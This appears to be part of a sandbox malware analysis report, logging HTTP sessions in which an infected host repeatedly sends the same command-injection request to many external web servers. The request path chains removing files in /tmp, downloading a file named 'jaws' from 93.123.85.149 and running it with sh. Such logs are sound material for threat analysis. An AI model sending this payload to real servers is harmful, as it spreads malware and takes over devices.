                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            67192.168.2.235635488.221.24.1080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:20.588355064 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:20.795444965 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:20 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:20 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 31 38 64 64 35 38 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 30 26 23 34 36 3b 32 39 63 37 30 38 63 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;618dd58&#46;1706279480&#46;29c708cf</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            68192.168.2.2351262210.76.76.6980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:20.732074976 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:22.540775061 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:24.904449940 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:29.255924940 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:37.958534002 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.108222008 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:29.919270992 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            69192.168.2.2339916184.50.79.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:20.743259907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:21.101804018 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:20 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:20 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 32 66 65 35 65 36 66 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 30 26 23 34 36 3b 33 38 37 38 63 39 34 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;42fe5e6f&#46;1706279480&#46;3878c940</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            70192.168.2.2337724103.123.4.8080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:20.789731979 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            71192.168.2.2343562212.107.17.5380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:20.948534012 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:21.165235043 CET932INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Fri, 26 Jan 2024 14:31:21 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            72192.168.2.2339778210.71.232.17780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:21.012973070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:21.294112921 CET59INHTTP/1.1 400 Bad Request
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            73192.168.2.2359358156.250.15.7380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:22.634380102 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:22.970468998 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:30:51 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            74192.168.2.233742023.65.32.13380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:22.785356998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:22.936032057 CET429INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 207
                                                            Expires: Fri, 26 Jan 2024 14:31:22 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:22 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 30 66 32 34 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 32 26 23 34 36 3b 35 31 31 37 36 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;950f2417&#46;1706279482&#46;511763</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            75192.168.2.2355064168.76.22.16980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:22.829927921 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.367872953 CET327INHTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 138
                                                            Connection: keep-alive
                                                            Location: http://www.baidu.com/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            76192.168.2.2350582185.114.96.7080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:22.833184958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.031688929 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.3
                                                            Date: Fri, 26 Jan 2024 14:31:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            77192.168.2.235363018.66.93.4080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:22.834753036 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.034993887 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            78192.168.2.2336186197.188.167.5980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.180588007 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            79192.168.2.234605634.199.210.5180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.425405025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.543903112 CET515INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 321
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 69 70 2d 31 37 32 2d 33 31 2d 34 38 2d 32 32 34 2e 65 63 32 2e 69 6e 74 65 72 6e 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at ip-172-31-48-224.ec2.internal Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            80192.168.2.2346376108.138.167.14480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.425509930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.545727968 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            81192.168.2.2350392208.69.96.8080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.456047058 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.615917921 CET516INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Server: lighttpd/1.4.39
